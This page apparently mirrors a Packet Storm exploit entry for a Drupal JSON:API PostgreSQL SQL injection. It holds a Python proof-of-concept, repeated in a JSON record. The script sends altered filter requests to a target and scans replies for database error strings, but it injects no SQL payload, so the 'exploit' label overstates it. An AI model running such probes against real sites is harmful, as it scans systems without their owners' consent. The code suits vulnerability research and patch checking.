📄 Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL...

Visit Original Source

Basic Information

ID PACKETSTORM:223236

Published Jun 11, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal |
==================================================================================================================================

[+] Summary : This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL.

[+] POC :

#!/usr/bin/env python3

import requests
import re
import sys
from urllib.parse import urlencode

class DrupalJSONAPIAuditor:
SQL_ERROR_PATTERNS = [
r"postgresql",
r"syntax error",
r"sqlstate",
r"invalid input syntax",
r"query failed",
r"database error",
r"exception",
r"stack trace",
r"uncaught",
r"warning:",
r"fatal error",
r"pdoexception",
r"doctrine",
r"sql error"

]
def __init__(self, url):
self.url = url
self.headers = {
"Accept":
"application/vnd.api+json",
"Content-Type":
"application/vnd.api+json"
}
def send_request(self, params):
try:
r = requests.get(
self.url,
params=params,
headers=self.headers,
timeout=10
)
return {
"status":
r.status_code,
"length":
len(r.text),
"body":
r.text
}
except Exception as e:
return {
"error":
str(e)
}
def baseline(self):
params = {
"filter[test][condition][path]":
"title",
"filter[test][condition][operator]":
"=",
"filter[test][condition][value]":
"example"
}
return self.send_request(
params
)
def mutated_filters(self):
tests = []
candidates = [
"unexpected",
"nested",
"long_key_name_" * 5,
"special_chars",
"duplicate"
]
for name in candidates:
params = {
f"filter[{name}][condition][path]":
"title",
f"filter[{name}][condition][operator]":
"IN",
f"filter[{name}][condition][value][0]":
"example"
}
tests.append(
(
name,
self.send_request(
params
)
)
)
return tests
def detect_error_leakage(self, body):
hits = []
lower = body.lower()
for p in self.SQL_ERROR_PATTERNS:
if re.search(
p,
lower,
re.I
):
hits.append(
p
)
return hits
def compare_response(self, base, other):
return {
"status_change":
base["status"] !=
other["status"],
"size_delta":
abs(
base["length"] -
other["length"]
)
}
def confidence(self, score):
if score >= 5:
return "HIGH"
if score >= 2:
return "MEDIUM"
return "LOW"
def run(self):
print(
f"[*] Auditing: {self.url}"
)
base = self.baseline()
if "error" in base:
print(
"[!] Request failed"
)
return
score = 0
print(
f"[*] Baseline: "
f"{base['status']} "
f"({base['length']} bytes)"
)
results = self.mutated_filters()
for name, result in results:
if "error" in result:
continue
diff = self.compare_response(
base,
result
)
leaks = self.detect_error_leakage(
result["body"]
)
print(
f"\n[{name}]"
)
print(
f"status change: "
f"{diff['status_change']}"
)
print(
f"size delta: "
f"{diff['size_delta']}"
)
if leaks:
print(
"error indicators:"
)
for l in leaks:
print(
f" -> {l}"
)
score += len(leaks)
if diff["status_change"]:
score += 1
if diff["size_delta"] > 100:

score += 1
print("\n==== SUMMARY ====")
print(
f"Exposure Score: {score}"
)
print(
f"Confidence: "
f"{self.confidence(score)}"
)

if __name__ == "__main__":

if len(sys.argv) != 2:
print(

f"usage:\n"
f"{sys.argv[0]} "
f"http://host/jsonapi/node/article"

)
sys.exit(1)
auditor = DrupalJSONAPIAuditor(
sys.argv[1]
)
auditor.run()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-11T16:00:18",
    "description": "This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL...",
    "published": "2026-06-11T00:00:00",
    "modified": "2026-06-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:223236",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-9082"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection                                                 |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.drupal.org/project/drupal                                                                            |\n    ==================================================================================================================================\n    \n    [+] Summary    : This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL.\n    \n    [+] POC        :  \n    \n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import re\n    import sys\n    from urllib.parse import urlencode\n    \n    class DrupalJSONAPIAuditor:\n        SQL_ERROR_PATTERNS = [\n            r\"postgresql\",\n            r\"syntax error\",\n            r\"sqlstate\",\n            r\"invalid input syntax\",\n            r\"query failed\",\n            r\"database error\",\n            r\"exception\",\n            r\"stack trace\",\n            r\"uncaught\",\n            r\"warning:\",\n            r\"fatal error\",\n            r\"pdoexception\",\n            r\"doctrine\",\n            r\"sql error\"\n    \n        ]\n        def __init__(self, url):\n            self.url = url\n            self.headers = {\n                \"Accept\":\n                    \"application/vnd.api+json\",\n                \"Content-Type\":\n                    \"application/vnd.api+json\"\n            }\n        def send_request(self, params):\n            try:\n                r = requests.get(\n                    self.url,\n                    params=params,\n                    headers=self.headers,\n                    timeout=10\n                )\n                return {\n                    \"status\":\n                        r.status_code,\n                    \"length\":\n                        len(r.text),\n                    \"body\":\n                        r.text\n                }\n            except Exception as e:\n                return {\n                    \"error\":\n                        str(e)\n                }\n        def baseline(self):\n            params = {\n                \"filter[test][condition][path]\":\n                    \"title\",\n                \"filter[test][condition][operator]\":\n                    \"=\",\n                \"filter[test][condition][value]\":\n                    \"example\"\n            }\n            return self.send_request(\n                params\n            )\n        def mutated_filters(self):\n            tests = []\n            candidates = [\n                \"unexpected\",\n                \"nested\",\n                \"long_key_name_\" * 5,\n                \"special_chars\",\n                \"duplicate\"\n            ]\n            for name in candidates:\n                params = {\n                    f\"filter[{name}][condition][path]\":\n                        \"title\",\n                    f\"filter[{name}][condition][operator]\":\n                        \"IN\",\n                    f\"filter[{name}][condition][value][0]\":\n                        \"example\"\n                }\n                tests.append(\n                    (\n                        name,\n                        self.send_request(\n                            params\n                        )\n                    )\n                )\n            return tests\n        def detect_error_leakage(self, body):\n            hits = []\n            lower = body.lower()\n            for p in self.SQL_ERROR_PATTERNS:\n                if re.search(\n                    p,\n                    lower,\n                    re.I\n                ):\n                    hits.append(\n                        p\n                    )\n            return hits\n        def compare_response(self, base, other):\n            return {\n                \"status_change\":\n                    base[\"status\"] !=\n                    other[\"status\"],\n                \"size_delta\":\n                    abs(\n                        base[\"length\"] -\n                        other[\"length\"]\n                    )\n            }\n        def confidence(self, score):\n            if score >= 5:\n                return \"HIGH\"\n            if score >= 2:\n                return \"MEDIUM\"\n            return \"LOW\"\n        def run(self):\n            print(\n                f\"[*] Auditing: {self.url}\"\n            )\n            base = self.baseline()\n            if \"error\" in base:\n                print(\n                    \"[!] Request failed\"\n                )\n                return\n            score = 0\n            print(\n                f\"[*] Baseline: \"\n                f\"{base['status']} \"\n                f\"({base['length']} bytes)\"\n            )\n            results = self.mutated_filters()\n            for name, result in results:\n                if \"error\" in result:\n                    continue\n                diff = self.compare_response(\n                    base,\n                    result\n                )\n                leaks = self.detect_error_leakage(\n                    result[\"body\"]\n                )\n                print(\n                    f\"\\n[{name}]\"\n                )\n                print(\n                    f\"status change: \"\n                    f\"{diff['status_change']}\"\n                )\n                print(\n                    f\"size delta: \"\n                    f\"{diff['size_delta']}\"\n                )\n                if leaks:\n                    print(\n                        \"error indicators:\"\n                    )\n                    for l in leaks:\n                        print(\n                            f\"  -> {l}\"\n                        )\n                    score += len(leaks)\n                if diff[\"status_change\"]:\n                    score += 1\n                if diff[\"size_delta\"] > 100:\n    \n                    score += 1\n            print(\"\\n==== SUMMARY ====\")\n            print(\n                f\"Exposure Score: {score}\"\n            )\n            print(\n                f\"Confidence: \"\n                f\"{self.confidence(score)}\"\n            )\n    \n    if __name__ == \"__main__\":\n    \n        if len(sys.argv) != 2:\n            print(\n    \n                f\"usage:\\n\"\n                f\"{sys.argv[0]} \"\n                f\"http://host/jsonapi/node/article\"\n    \n            )\n            sys.exit(1)\n        auditor = DrupalJSONAPIAuditor(\n            sys.argv[1]\n        )\n        auditor.run()\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/223236",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/223236/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection_PACKETSTORM:223236

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply